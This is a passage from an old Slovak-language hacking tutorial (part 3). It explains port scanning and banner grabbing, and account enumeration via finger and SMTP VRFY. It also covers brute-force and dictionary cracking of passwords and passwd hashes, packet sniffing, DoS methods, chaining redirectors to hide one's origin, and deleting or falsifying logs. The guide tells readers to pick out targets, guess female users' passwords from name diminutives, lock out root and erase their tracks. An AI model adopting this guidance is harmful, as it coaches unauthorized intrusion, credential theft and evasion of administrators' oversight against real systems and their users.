3.ČASŤ

OK … môžme pokračovať ďalej … v tejto časti príručky si povieme o technikách ktoré využívajú crackeri na preniknutie do systému. A nielen crackeri ale aj hackeri… Predpokladá sa že každý správny hacker ma za sebou nejaký ten cracking pre zábavu a získanie nových skúsenosti a pozná veľa základných technik. I hackeri majú svoju etiku ktorej sa držia:

1. Viera že zdieľanie informácii je správne a že je etickou povinnosťou hackerov sa deliť o svoje poznatky písaním open source a uľahčovaním prístupu k infomáciam čo v najväčšej miere.
2. Viera že nabúravanie do systémov pre zábavu a získanie skúsenosti je eticky v poriadku pokiaľ však nedôjde k vandalizmu , zničeniu informácii či porušenie ich utajeniu.

Takže si povieme nejaké pravidla ktorých by ste sa mali držať ! 1.Nikdy nahackujte pre popularitu !!! Nemeňte index !!! ale pre zábavu a získanie informácii (skúsenosti) 2. Po nabúraní nezneužívajte informácie, neporušujte súkromie ľudí, neničte pracú druhých , nekradnite !!! 3. Po nabúraní do systému vysvetlite správcovi najlepšie s mailom zo super užívateľského účtu ako došlo k nabúraniu a ako tuto dieru zaplátať.

Verte tomu že ak budete dodržiavať tieto body získate si dobre internetové vzťahy a budete viac populárnejší ako crackeri Možno nie v TV nebudú sa o vás písať články v novinách ale v očiach správcov ktorý vám budú ochotný stále pomôcť …

Porty a služby

O portoch už bola reč teraz sa pozrieme aké služby bežia na jednotlivých portoch. Tieto služby môžu obsahovať (a väčšinou aj obsahujú nejakú chybu cez ktorú môžme preniknúť dnu. Čím viac služieb server poskytuje tým mame väčšiu šancu prieniku. Pozrime sa teraz na štandardné služby a na porty kde štandardne bežia.

port 7 echo – Echo je jednoduchý nastroj protokolu ICMP, ktorým môžeme testovať dosažitelnosť jednotlivých uzlov v internete. Vy odošlete žiadosť o echo (ICMP-paket) a cieľový uzol je povinný odpovedať ICMP-paketom (echo) Vyskúšať si to môžte napr. s programom ping obsahuje ho každý OS.

port 21 ftp – Určíte veľa z vás sa stretli s touto službou. Používa sa na prenos súborov. Ftp je najčastejšie nastavený tak aby prijímal iba požiadavky iba od tých užívateľov , ktorý majú na systému kde beží FTP server užívateľský účet. Ale môžte ho nastaviť aj ako anonymní FTP ktorí bude prijímať požiadavky od každého. Ale hackeri často nájdu nejakú štrbinku a preniknú cez anonymní ftp do systému 

port 22 ssh – Je to akási náhrada za telnet. Telnetom neprebieha komunikácia kryptovane čiže je tam možnosť odchytávania hesiel atd… SSh tento problém rieši tým že cela komunikácia prebieha kryptovane.

port 23 telnet – S touto službou si vytvárate sedenie na vzdialeným počítači. Čiže sa prihlasite a pracujete sním ako keby ste sedeli pri ňom Tu je to riziko že je možnosť odchytávanie hesiel a pre hackera nie je to problém 

port 25 smtp – tuto službu už využíval každý je to poštovný protokol. Cela poštová komunikácia prebieha cez smtp protokol ak sa chcete naučiť posielať fake-maili naučte sa smtp protokol . O prenos posty z jedného počítača na druhy sa stará program sendmail ktorý je veľmi kvalitným poštovným agentom 

port 53 Nameserver (bind) – Tato služba je asi najderavejšia stále sa tu nájde nejaká chybička. Nameserver sa stará o správu domény.

port 79 finger – Pomocou fingeru sa získavajú informácie ktoré hackerovi môžu veľa pomôcť:)

port 80 http – Cez protokol http sa prenášajú www stránky a asi ho používate veľmi často 

port 110 pop3 – Pomocou tohto protokolu si vyberáte maili z mailových schránok 

To boli štandardné porty ak chceš vedieť aké iné služby bežia na ktorých portov pozri si straku www.unio.org … Neznamená to ak napr. služba smtp nebeží na porte 25 tak tuto službu už server neposkytuje ,,, môže kludne bežať aj na porte 1252 záleží na správcu či ju chce poskytovať každému alebo hodí to na vyši port a vie otom iba on Scanovanie Portov…

Ak chceme zistiť či daná služba beži na serveri môžme to urobiť jednoducho. Pomocou telnetu sa telnetneme na štandardný port danej služby a ak sa spojenie uskutoční služba beží a ak nie tak nebeží. Ak chceme zistiť všetky služby ktoré na mašinke bežia musíme sa telnetnúť na všetkých 65355 portov. Je to pekná drina sa telnetovať postupne na všetky porty a zapisovať si kde sa uskutočnilo spojenie a aká služba tam beží Našťastie existuje utilita ktorá za nás túto špinavú robotu urobí a podá nám hlásenie Existuje niekoľko typov scanerov…

connect() scan tento druh scaneru je najstarší Postupne sa pokúša klasický pripájať na každý port ak sa spojenie uskutoční označí port ako za otvorený a ak nie tak za uzavretý… FIN, Xmas tree a NULL scan Tieto typy scanerov využívajú chyby v TCP protokole.

Existujú aj dalšie typy scanerov a určíte vzniknú aj iné Všetky sú založené na nejakej chybe v TCP protokole a pod…

Ovládanie scanerov je veľmi jednoduché ako parameter sa zadá IP adresa stroja ktorý chceme scanovat a zatím číslo portu po ktorý chceme scanovať … výstup záleží od scanu ale väčšinou vizerá nie jak takto :

• 21 (ftp) is running.
• 23 (telnet) is running.
• 25 (smtp) is running.
• 79 (finger) is running
• .80 (http) is running.
• 110 (pop-3) is running.
• 935 (UNKNOWN) is running

Vidíme že na serveri je otvorených 7 portov cez ktoré sa môžeme dostať dnu do systému Ostáva nám zistiť aké verzie služieb bežia a vyhľadať exploity Získavanie informácii o serveri je prvým krokom čo hacker uskutoční a kto mu patri aj scanovanie aby zistil aké služby bežia a urobil si tak predstavu o preniknutí na server alebo aj o IQ správcu (o: Masové scanovanie

Masové scanovanie je obyčajné scanovanie stým rozdielom že sa nescanuje jedna Ipečka ale nie jaky rozsah Ipečiek. Nescanuju sa všetké porty ale iba porty na ktorých bežia nabúravatelné služby … Takto sa hacker neorientuje iba na jednu masinu ale na lubovolnu za ucelom hodit na nu redirector a pod.. ( o redirectorov viac dalej).

A nakoniec niejake url kde ziskate tie najlepsie scaneri … samozrejme bezia pod linuxom http://www.insecure.org/nmap – nmap najznamejsi a patri medzi najlepsi port scaner. http://www.nessus.org – nessus tento scanerik dokaze poskytnut mnozstvo informacii o zabezpeceni vasho systemu. Lamanie hesiel …

Dajme tomu ze chceme prelomit heslo roota na niejakej masinke … Mozme napr. sa telnetnut na port 23 kde bezi sluzba telnet (samozrejme ak je pristupna) zadame Login root a potom nas telnet vyzve na zadanie hesla … to heslo samozrejme nemame .. mozme predpokladat ake heslo by mohol si root zadat .. vyskusame ako heslo jeho login cize root , ak vieme co rad robi tak ako heslo vyskusame jeho zalubu , meno jeho dievcata a pod … mozno budeme mat stastie a podari sa nam heslo uhadnut (o: Nieje to nic prijemne a ked budeme chciet vyskusat okolo 1000 moznych hesiel rychle nas to omrzi (o: Ale nastastie existuju utilitky ktore to budu robit za nas a ovela ale ovela rychlejsie … Tieto utilitky vyuzivaju najcastejsie dva metody hadania hesiel …

1. Brutal Force – je to metoda pokusov a omylov Utilitka skusa vsetke mozne kombinacie cisiel , znakov napr. aaaa , aaab , aaac , aaad atd … Existuje cela kopa utilitiek s vela funkciami kde si mozte nakonfigurovat z ktoryh pismen ma vytvarat kombinacie , kolko miestne heslo , ci ma pouzivat aj cisla atd …
2. Dictionary Attack – utok pomocA­ wordlistu (slovnA­ku). Slovnik obsahuje niekolko tisic slov ktore sa mozu vyskytnut ako heslo. Slovnikov na internete najdete spustu podla roznych zamerani. napr. mena skupin, slovensky slovnik , cesky slovnik , nazvy mien atd …

Spomenuly sme si dve techniky lamania hesiel. Obycajny uzivatelia si volia lahko zapamatatelne heslo. Ak maju heslo pridelene tak si ho vacsinou zmenia na lahsie (ak je to mozne)alebo si ho niekde zapisu. Ak sa pokusate zlamat heslo niejakej konkretnej osoby snazte sa o nej dozvediet co najviac vela uzivatelov pouziva ako heslo, rodne cislo , meno frajerky , oblubenej skupiny a apod… Ty lepsi sa snazia robit kombinacie napr meno frajerky s svojim datumom narodenia atd .. Na take hesla nam je Dictionary Attack nanic lebo vacsinou slovniky taketo slova neobsahuju .

Priemerna dlzka hesla je 6 znakov . Uzivatelia si volia hesla vacsinou z malych pismen a pouzivaju slova ktore maju niejaky zmysel ako keby mali pouzivat niejake kombinacie cislic a znakov … Teraz sa pozrieme na percentualny vyskyt pismen v hesle ktore sa vyskytovali na jednom hacknutom serveri

znak hacked

• a 10,38
• b 1,96
• c 2,51
• d 2,65
• e 5,92
• f 1,02
• g 1,15
• h 1,60
• i 5,63
• j 1,00
• k 4,15
• l 3,99
• m 3,47
• n 4,67
• o 6,81
• p 2,21
• q 0,16
• r 5,39
• s 4,25
• t 3,88
• u 2,32
• v 1,49
• w 0,50
• x 0,42
• y 0,74
• z 0,61
• 1 3,07
• 2 2,27
• 3 1,44
• 4 1,24
• 5 1,51
• 6 1,60
• 7 1,90
• 8 1,46
• 9 1,54
• 0 2,42
• A 0,28
• B 0,11
• C 0,09
• D 0,13
• E 0,13
• F 0,06
• G 0,04
• H 0,06
• I 0,14
• J 0,06
• K 0,14
• L 0,10
• M 0,22
• N 0,10
• O 0,13
• P 0,12
• Q 0,00
• R 0,14
• S 0,16
• T 0,10
• U 0,04
• V 0,06
• W 0,02
• X 0,03
• Y 0,02
• Z 0,04

Skusat lamat hesla mozte v roznych sluzbach cez ftp , telnet ale najlepsie je cez pop3 (standartny port 110). Protokol pop3 pouzivate ked si idete vybrat emaili … (prestuduj si protokol pop3 a vyskusaj si precitat postu cez telnet … ) Ake su vyhodi lamania hesla cez pop3 ??? Tato sluzba bezi skoro na kazdom serveri … Pri nespravnom hesle je moznost okamziteho opakovania Ak hladas hesla cez ftp alebo telnet moze po niekolko neuspesnych pokusov bloknut konto a tym padom nemozes skusat dalej cez pop3 to vacsinou neplati … Po niekolkych pokusov ta server odpoji ale mozes sa napojit a skusat dalej … A co je najpodstatnejsie na niektoryh systemov sa neloguju nespravne pokusy…

O utilitkou takeho druhu na internete nieje nudza a urcite ich lahko najdes. Ale mi chceme byt hackeri tak by sme nemali mat problem si taku utilitku naprogramovat sami Exploitova Technika

Hackeri vobec nevyuzivaju na prienik do systemu vyssie popisanu tychniku (lamanie hesiel) Ale dostavaju sa dnu pomocou exploitov. Exploit moze byt program alebo niejaka specialne zadana URL ktora sposobi neobykle chovanie systemu napr. nam hodi rootovske prava. Vacsina tychto exploitov vyuziva Buffer Overflow co znamena pretecenie zasobniku. Nie vsetke exploity vyuzivaju len Buffer Overflow vela sluzieb beziacich na serverov je dieravych (IMAP, sedmail , bind , pop3 a pod) cez ktore mozme ziskat rootovske prava… Hacker si jednoducho pozistuje cim viac informacii o serveri , ake sluzby na nim bezia, ake verzie, pod akym os server bezi atd.. a snazi sa najst na niejaku sluzbu exploit ktory mu zabezpeci rootovske prava Ak zisti ze niejake sluzby su dierave stiahne exploit spusti ho a server je jeho (o:

Tieto exploity su volne dostupne najdete ich na strankach www.rootshell.com alebo www.bugtray.com a na skoro vsetkych ktore sa zaoberaju bezpecnostou… Najlepsie je sledovat mailing list, bugtrag a vsetke stranky ktore sa zaoberaju pocitacovov bezpecnostou. Ak sa vyskytne niejaka nova diera hned budete informovany a budete si moct dieru zaplatat alebo naopak vyuzit ju na prienik do cudzieho systemu … Kazdy spravca ktoremu zalezi na bezpecnosti by mal sa zaregistrovat do mailing listou a sledovat stranky zaoberajuce sa pocitacovov bezpecnostou … zial to tak nieje a malo ktory spravca si da zalezat aby si pravidelne zaplatal nove dieri … Sniffing

Pozname viac topologii sieti. Topologiou siete rozumieme strukturu ktorou vytvaraju kabely prepojujuce jednotlive uzly siete. Najjednodussiu topologiu ma sbernica. Je tvorena vedenim k nemu su pripojene jednotlive uzly. Ak spojime obidve konce zbernice ziskame topologiu kruhovu. A tretim je topologia hviezda. U hviezdy vychadzaju jednotlive vedenia paprskovite z centralneho zariadenia v ktorom su prepojene. (Rozbocovac) Ok ale nejdeme budovat siete Predstavme si ze mame doma postavenu siet z styroch pocitacov v sbernicovom zapojeni. (cize su pospajane postupne). AK prvy pocitac komuniku s stvrtym pocitacom pakety prechadzaju aj cez druhy a treti pocitac ale sietove karty tychto pocitacov sa o tieto pakety nestaraju lebo niesu adresovane im a ich prepustia dalej…Ale sietova karta sa da nastavit do tzv. promiskuitneho modu co zapricini ze sietova karta si uz bude vsimat aj pakety ktore mu nepatria 

Pomocou odchytavania paketov mozeme velmi jednoducho zistit hesla uzivatelov lokalnej siete pouzivajucich programy telnet, ftp, atd…Sietovu kartu do promiskuitneho modu moze prepnut iba root. (niektore starsie sietove karty ani prepnutie do tohto modu ani nepodporuje). Cize najlepsie je odchytavat paketu na svojej lokalnej sieti alebo uz na niejakej hacknutej masinke…

snifferi prave prepnu sietovu kartu do promiskuitneho modu a zacne odchytavat vsetke pakety ktore prejdu cez masinku. Ale ak nam bude odchytavat vsetke pakety budeme mat problem najst pozadovany paket z mnozstvo odchytenych paketov. Na tento problem sluzia rozne filtre ktore snifferi obsahuju.

Pomocou filtra si urcime ake pakety ma odchytavat. Najlepsie je ho nastavit tak aby zachytaval iba pakety na tych protokolov kde sa vyzaduje zadat login a heslo (ftp, pop3, telnet atd).

Ani o snifferi nieje nudza na internete dokonca i na slovenskom internete najdete poriadne snifferi ktore obsahuju poriadne filtre s vela moznostami … DoS attack (Denial of Service)

POmocou DOS utoku zmemoznime pouzivat niejaku sluzbu na serveri alebo odstavime cely server. Je lahko DoS utok vyvolat ale tazko je proti nim sa branit… Ako si mozno uz myslite nieje to hackovanie ale zato sa dost to vyuziva preco ???

1. Bud sa chce niejaky lamer ukazat ze nieco dokaze
2. Z pomsty
3. K ziskaniu pristupu na server

Dos utokov je obrovske mnozstvo … Vacsinou sa vyuzivaju k ziskaniu pristupu na system. Ako sme povedali proti dos utokom je sa tazko branit ale neurobia na serveri ziadnu skodu , ale sposobia iba vypadok servera ktory je treba potom iba rebootovat a bezi dalej ako keby sa nic nestalo …(o: A naco je dobre rebootovanie servera ???

Niektore systemu obsahuju dieri pri startovani , ktore sa mozu vyuzit k ziskaniu rootovskych prav Pri rebootovani mozme system ovladnut zatial ked startuje pokial vieme na ktorom porte pocitac nacuva. Na tento port sa posielaju falosne pakety s ktorymi ovladneme system …

Teraz sa pozrieme na niejake priklady DOS utokov je ich obrovske mnozstvo a nebudem tu popisat vsetke a ani vsetke neviem DOS utoky nemusia prebiehat len z vonka ale aj z vnuutra takze stych najznamejsich …

Znemoznenie pristupu – Niektore serveri maju nastavene ze po urcitom pokuse zleho prihlasenia na ucet , ucet zablokuje… a tym padom sa nebude moct prihlasit ani uzivatel ktory vie spravne heslo. Ak sa serveri je to nastavene mozme to urobit na roota … po niekolkych pokusov sa konta zablokuje a uz sa nebude moct nalogovat root , jedinim riesenim bude rebootovat masinku ...... E-mail spamming – urcite viete ak poslete email na neexistujuci email tak vam pride o tom informacia prostrednictvom mailu (Mail Administration Error). AK utocnik posle zaujimavy fake-mail vsetkym na serveri a vacsina tychto userov sa budu snazit na neexistujuci email odpovedat moze dojst k zahlteniu siete alebo vyradenie sluzby SMTP ci POP… Ping flooding – tato metoda je dost stara a skoro uz nikde nefunguje Pomocou pingu vyslete velky ICMP paket. Server dostane paket po castiach a zacne ho skladat ale paket je velmi velky tak nastane pretecenie a system sa rebootne alebo zamrzne … Je to uz hrozne stare a uz to vobec nefunguje Anonymni FTP – Ak na serveri bezi anonymni FTP a mate pravo nan zapisovat tak mozte sa pokusit zaplnit cely HDD ale iba pokial je zle nastavene obmedzenie anonymnych uzivatelov.

To boli niejake utoky z vonku ako som pisal existuju aj DOS utoky z vnutra. Utoky dos z vnutra maju jednu velku nevyhodu spravca systemu rychlo zisti kto sposobil DoS utok lebo vsetko sa zapisuje do logov. Takze po rebootnutiu si pozrie kto bol prave prihlaseny a co robkal (o: ale pozriet si niejake mozme … Zaplnenie HDD – pokusime sa zaplnit cely HDD a tak znemoznit zapisovat na HDD inym userom … Zial ho mozme vyuzit malo kde stohto dovodu lebo userom sa nastavuju kvoty na disk. Zaplnenie pamati – MOzme sa pokusit alokovat vsetku dostupnu pamat. System zacne swapovat a celkom sa spomali a moze dokonca aj zatuhnut. Ale spravca moze urcit aj limit pamate a vyhnut sa pouzitiu tohto DoS utoku:)

OK to je o dos vsetko .. o novych dos utokov sa samozrejme dozviete na strankach ktore sa venuju pocitacovej bezpecnosti .. Redirektor

Vsetko o co sa pokusame , co na serveri robime sa zaznamenava do logov (aj ked si prezerade stranky, pouzivate finger atd.. zalezi aj od spravcu co chce logovat) … Ak sa spravca dozvie ze niekto hackol jeho msinku pozrie sa hned do logov a objavi vasu IP adresu Samozrejme mozme logy vymazat (viac dalej) ale nikdy si nieste isty ci ste vymazali vsetko .. a co ked sa loguje priamo na tlaciaren ??? vtedy sa logy nedaju vymazat .. (o:

Svoju totoznost mozme zakryt programikom s nazvom redirektor… Najprv sa pozrime ako redirektor funguje. Dajme tomu ze sme hacli niejaky zabudnuty skolsky server. Na ten server si umiestnime redirektor. Po spusteni redirektoru sa napoji na niejaky port a bude pocuvat. Ak sa niekto napoji na tento port , redirektor sa napoji na cielovy pocitac a vsetke pakety ktore prijme odosle na druhu stranu A tak sa cielovemu pocitacu javime ako keby sme utocili z pocitaca na ktorym je redirektor umiestneny a nie na tym z ktoreho pocitaca naozaj utocime. Ak hacker ma dostatok hacknutych masin moze si z redirektorov urobit celu siet a je prakticky nevystopovatelny… Pakety sa budu presuvat od jedneho pocitaca cez druhy az na cielovy pocitac … a to uz vazne maju co robit aby vas vystopovali 

Nieje to iba tato vec ktora sa da vyuzit pomocou redirektora… Dajme tomu ze niekto ma pristup do ineho systemu na zaklade kontroly IP adresy napr news server ktory pracuje pre urcitu domenu … nato aby sme sa dostali na tento system nam posluzi redirektor.

Redirektor sa nevyuziva len na kale ucely ale mozme ho vyuzit aj pre svoj prospech Uvedieme maly priklad … Dajme tomu ze v skole mame pristup na internet ale firewall nam zakaze vsetke spojenia ktore idu na port 6667 (Sluzba IRC) cize nemozeme pouzivat IRC. Takze si hodime redirektor na niejaku inu masinku mimo nasej skoly a nastavime ho nasledujuco: redirektor 5858 irc.napri.sk 6667 Teraz vam staci nastavit IRC klienta na masinku kde je umiesteny redirektor a nastavte ho na port 5858 . Redirektor vsetke pakety presmeruje na server irc.napri.sk na port 6667 kde bezi sluzba iRC (irc demon) … Tak sme sa vyhli zakazu nepouzivania IRC a kludne si mozme pokecat hoci nam to zakazali (o:

Redirektor je pekna vecicka a tiez sa na inete da stiahnut kde by ste ani nechcely jeden si stiahnite a vyskusajte si presmerovat pakety … (o: alebo este lepsie naprogramujte Ziskavanie Informacii

Ak si vyhladneme niejaku masinku do ktorej sa chceme naburat ako prve musime o nej ziskat cim viac informacii Ako prve sa pozrieme ake sluzby na serveri bezia. (cize oscanujee masinu) Potom sa pokusime zistit verzie jednotlivych sluzieb (pod akym programom a ktora verzia) Asi netreba pisat preco ??? ak vieme aka presna verzia programu bezi mozme sa pokusit vyhladat na internete exploit a pomocou neho preniknut dnu. Ak exploit na danu sluzbu neexituje tak mozme si stiahnut zdrojak a mozme zacat ho studovat a niejaku chybycku najst Tak isto sa pokusime zistit presnu verziu OS jednotlive distribucie obsahuju defaultne ucty , ktore sa vytvoria po nainstalovani a spravca ich zabudol opravit bud zmenit hesla atd… Pomocou tychto defaultnych uctov sa mozme dostat dnu vacsinou heslo=login ..

Ako ziskat tieto infosky ??? Vacsina sluzba pred logovanim (alebo po) vas oboznamia s nazvom programu a verziou… vyberte si niejaky server a skuste sa nanho klasicky telnut (port 23 ak na serveri ta sluzba bezi) cize zadame telnet www.server.sk 23 a mozte uvidiet nieco taketo : RED HAT LINUX release 6.2 (zoot) Kernel 2.2.14–601 on an i686 login: Ako vidite server vam povedal aky system pouziva su to velmi cenne infosky … Podobne sa mozme pozriet na dalsie sluzby napr na FTP … cize sa klasicky telnetneme na ftp telnet www.server.sk 21 vystup: 220 www.server.sk FTP server (version wv –2.6.0(1) mon feb 28 10:30:36 EST 2000) ready A zas sme dostali co sme chceli verziu FTP … A Mozme ist dalej napr. smtp telnet www.server.sk 25 Vystup: 220 www.server.sk ESMTP Sendmail 8.9.3/8.9.3; Thu 24 may 2001 17:32:04 –0400 Vidime aky program sa stara o postu a aj presnu verziu cize sendmail 8.9.3/8.9.3

A takto mozme pozbierat vsetke infosky z servera… su to velmi cenne ifnormacie .. !!! Po zisteni tychto informaciu uz staci len vyhladat exploity a vediet ich pouzit Vacsina server tieto infosky vam poskytuje. Vacsinou sa spravcovi nechce ich specifikovat alebo dokonca zasahovat az do zdrojoveho kodu aby tomu zabranil 

Dalsie informacie ktore sa nam mozu zist su informacie o menach uctov, domacich adresarov, aktivnych uzivatelov a pod… Nato je urcena sluzba finger bezi na porte 79 ,,, ak je tato sluzba pristupna tak v linuxe mozme pouzit prikaz finger … napr. ak si chceme zistit ci je niekto prave prihlaseny tak zadame

finger @www.server.sk

server nemusi hned vyklopit vsetkych prihlasenych uzivatelov ! miesto toho sa vam zobrazi hlaska Must provide username … to znamena ze musime zadat niejake meno , nemusi to byt spravny login ale staci hocijake meno ak uzivatel stakymto menom existuje vypise sa jeho login plus dalse infosky o nim … cize si zvolme napr. katka finger katka@www.server.sk ak takyto uzivatel existuje vypisu sa infosky inak sa vypise hlaska no such user podobnym sposobom si mozme zistit informacie o uzivatelovy root ako jeho meno, jeho adresar, aky ma shell a pod.. finger root@www.server.sk Tak mozme skusat niejake mena a ziskavat konta ktore nasledne mozme naburat … spravcovia sa brania ako mozu a vymisleli tzv. fake finger cize vam poskytuju falosne informacie o uzivatelov a pod … (o: ak je na serveri dostatok kont nieje problem niejake heslo uhadnut … najme uzivatelkam renata, katka, zuzana atd… vyskusajte ako hesla ich menne zdrobneliny ako napr. renatka, zuzanka a pod .. Ako zistime vsetkych uzivatelov servera ??? (loginy) ak je to niejaky skolsky server tak sa pozrite na ich stranky vacsinou skoro kazdy ziak ma svoj email a vacsinou su zverejnene na strankach (o: vyskusajte sa pozriet na stranocky a urcite niejake konta najdete … nie vsak vsetke ! Ak chcete zistit vsetke konta mozte to skusit fingerom pozriete sa aky ma adresar nastaveni root a hodime na to finger napr ak ma /bin/bash zadame finger /bin/bash@www.server.sk je to uz velmi stara finticka a uz skoro vobec nepouzitelna ale skusit mozete mozno vam to pekne vyklopi vsetke ucty Ale vazne funguje len malo kedy musime skusat aspon krstne mena .. napr… janka, katka atd.. (finger janka@www.server.sk)

Ale co ak finger nieje vobec pristupny ??? ak sluzba finger nieje vobec pristupna mozme hadat loginy pomocou protokolu SMTP kto si uz nastudoval protokol SMTP vie uz o co ide kto nevie nech ajtak prestuduje hoci teraz to napisem … Pomocou prikazu VRFY mozeme zistit ci dane konto existuje … jednoducho sa telnetneme na port 25 a ak budeme chciet zistit ci existuje konto qwertz zadame : vrfy qwertz ak sa vypise 550 qwertz. User unknown dane koto neexistuje a mozme skusat dalej ale ak sa vypise podobne tomuto: 250 qwertz angel <qwertz@server.sk> dane konto existuje a mozme zacat hadat hesla o zistovany uzivatelov a fingerovani uz by aj stacilo .. prestudujte si manualovu stranku fingera (man finger) Socialne inzinierstvo

a ako posledny druh ziskavania informacii o serveri je socialne inziniesrstvo. Pomocou socialneho inzinierstva mozte dokonca ziskat aj heslo o co vlastne ide ? vydavate sa za niekoho ineho a snazite sa ziskat informacie … osobne ja stym nemam ziadne skusenosti lebo nikdy som to nepouzival … ale vravi sa ze je to skveli sposob ako ziskat infosky o serveri … napr.. sa budete zadavat za niejaku holku na ircecku kde je spravca niejakeho servera .. a date sa snim do reci … a uz zalezi od IQ spravcu a vasej sikovnosti kolko z neho vytiahnete .. Vacsinou to vraj funguje iba raz lebo samozrejme druhykrat sa spravca neda nachytat ak zisti ze vdaka jeho najivnosti mu hackli server … Zavisi vazne iba od vasej sikovnosti … ale ja osobne si myslim ze je to totalna blbost … ale spomenul som to aby ste vedeli ze existuje aj nieco taketo … (o: Naburavanie ???

Ak mame dostatok informacii o serveri mozme sa pokusit sa donho preniknut… asi najlahsou cestou je pouzit niejaky exploit ale teraz sa pozrime na trosku zlozitejsi pripad ako preniknut do systemu V prvom rade sa musime dostat dnu cez hociakeho normalneho uzivatela … vyberieme si niejake konto a pustime sa do lamania hesla … Ak na serveri je vela uzivatelov nieje problem niejake zlomit … najlepsie je skusat hesla na uzivatelov nezneho pohlavia vacsinou si volia velmi lahke hesla napr.. svoje meno, priezvysko , alebo niejaku tu zdrobnelinku … napr… renata , renatka, RENATA atd … (nezabudnite ze sa rozlisuju male a velke pismena cize RENATA nieje to iste ako Renata alebo ReNata ale to urcite viete Tiez sa mozes sustredit na sluzobne konta ako www, webmaster, admin, webadmin , spravca atd … (samozrejme si najprv zisti ci taketo konta vobec existuju hadat hesla mozeme cez telnet , ftp (pozri Lamanie hesiel vyssie:)

Ak sa nam podari prelomit heslo tak sa pekne cez tento login prihlasime telnetom (port 23 ako prve si musime stiahnut subor passwd ktory sa nachadza zvicajne v adresari /etc tento suborik obsahuje vsetkych uzivatelov a mozno aj zakryptovane hesla. (tiez si ho mozme poslat na email uz urcite viete s linuxom posielat emaili , prenasat subori a pod.. ak nie … tak sa ucte… jednoducho subor passwd musite dostat na svoj kompik:) Subor passwd …

ak ste ziskali passwd subor tak si ho prezride mozte tam vidiet nieco podobne tomuto :

---

root:mlslNX69rMTMp:0:0:System PRIVILEGED account:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false named:x:25:25:Named:/var/named:/bin/false gdm:x:42:42::/home/gdm:/bin/bash piranha:x:60:60::/home/httpd/html/pi­ranha:/dev/null postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash pvm:x:24:24::/usr/share/pvm3:/bin/bash lamers:K6Uln9aNpluKk.:505:200:Technicky Servis,,,,:/home/technik:/bin/bash

horvat:K4lJNXC9rUTMk:509:701:Ivan Horvat:/home/horvat:/bin/tcsh

vyberieme si stoho jeden riadok a podrobne si ho vysvetlime: qwertz:mlslNX69rMTMp:100:500:Qwertz Angel:/home/qwertz:/bin/bash

qwertz: – Login (stym sa prihlasujeme do systemu) mlslNX69rMTMp: – Toto je zakryptovane heslo tzv irreversibilny algoritmus cize neexistuje sposob ako ho odsifrovat 100: – UserID .. ID je cislo, ktore linux pouziva k indentifikacii uctu uzivatela. 500 -GroupID – cislo skupinu pod ktoru uzivatel patri Qwertz Angel – Plne meno uzivatela /home/qwertz: -domovsky adresar /bin/bash -Shell ktory pouziva

Takze heslo je zasifrovane 13 miestnym algoritmom. Ako sa da odsifrovat ??? nieje sposob ako sa da odsifrovat lebo je to irreversibilny algoritmus co znamena ze je kodovany nevratne … pozrime sa co sa deje ak sa prihlasujeme na masinku… zadame login a heslo … heslo sa zakoduje tym istym algoritmom a porovna sa v passwd subore .. ak sa retazce zhoduju znamena ze heslo je spravne ak sa nezhoduju heslo je nespravne … cize ak chceme z passwd suboru zistit heslo musime pouzit pokusy a omyli .. cize si musime zohnat program ktory skusa hesla z slovnika alebo sposobom brute atak ale pred tym ho zasifruje a porovna ho s retazcom v passwd ak sa zhoduju heslo je spravne ak nie pokracuje dalej … Na taketo lamanie hesiel existuje zas kopu softu a je samozrejme lahko dostupny aj na inetrnete 

Ak miesto zakryptovaneho hesla uvidite znak „x“alebo „*“ alebo podobny zalezi od typu unixu tak je heslo zatienene (shadowed)V tomto pripade je zakryptovane heslo ulozene v celkom inom subore do ktoreho ma pristup iba root a jadro systemu … v tomto pripade z neho hesla nevitiahneme ale aspon mame informacie o userov… tolko o subore passwd … Logy a mazanie sa z logov.

Vsetke vase aktivity sa zaznamenavaju do logov. Spravu systemovych logov zabezpecuje syslogd (syslog demon). Skuste sa pozriet do suborov /var/log/syslog a /var/log/messages uvidite tam vsetke vase aktivity kedy ste sa logovali, co ste robili vsetko vsetko vsetulinko. Zalezi aj od roota co chce logovat a najma kam sa maju zapisovat vsetke nase cinnosti.

Ako je to s mazanim stop? Ako prvu vec sa treba popozerat po /etc adresari a prestudovat vsetke dolezite konfiguracne subory aby sme si urobili predstavu o serveriku a najma aby ste zistili kde sa loguje. Administrator kludne moze zmenit adresar kde sa ukladaju logy. A vy mozte mazat logy z defaultnych adresarov ked ajtak tam nic nieje Najlaksim sposobom ako zmazat stopy po nasich aktivitach je samozrejme otvorit textovy log v niejakom editore a zmazat v nom riadky po nasej nekalej cinnosti… Existuju aj vselijake skriptiky ktore to urobia za vas … ale samozrejme je vhodne aspon skontrolovat ci sa vymazalo co malo Ak ste editli textovy log a vsetke svoje aktivity vymazali neznamena to uspesne zamaskovanie. Administrator moze logovat na niejaku inu masinku Potom vam ostava hacknut aj tuto druhu ale tiez moze nastavit aby logovalo priamo na tlaciaren noa to ste uz v keli preto treba stale pouzivat redirektori 

Okrem textovych logov existuju tiez binarne logy (lastlog, wtmp, utmp) Tieto subory su binnarne cize ich nemozeme editovat. Pozrite si ich manualove stranky (man wtmp , man lastlog, man utmp). Na cistenie z tychto logov existuje spusta malich programikov vacsinou nazyvane cistice. Subor lastlog je ulozeny vacsinou v adresari /var/log/lastlog v nom najdete zaznamy o poslednom pripojeni kazdeho uzivatela. Subor wtmp je ulozeny vacsinou v adresari /var/log/wtmp v nom najdete informacie skade a ako dlho kto bol pripojeny. Subor utmp je vacsinou ulozeny v adresari /var/run/utmp obsahuje informacie o momentalne prihlasenych uzivatelov. Tiez existuju logy do ktorych sa zapisuju vsetke prikazy napisane v shelli. Najlepsie bude ak si precitate manualove stranky (man bash alebo man tcsh) Existuju aj dalsie subory kde sa loguje ale postupnym spoznavanim linuxu urcite nato pridete Este lepsie ako sa vymazat z logov je ich strosilinku opravit a tak priviest administratora na falosnu stopu ale to uz zalezi od vas … O logovani , logov by to bolo aj 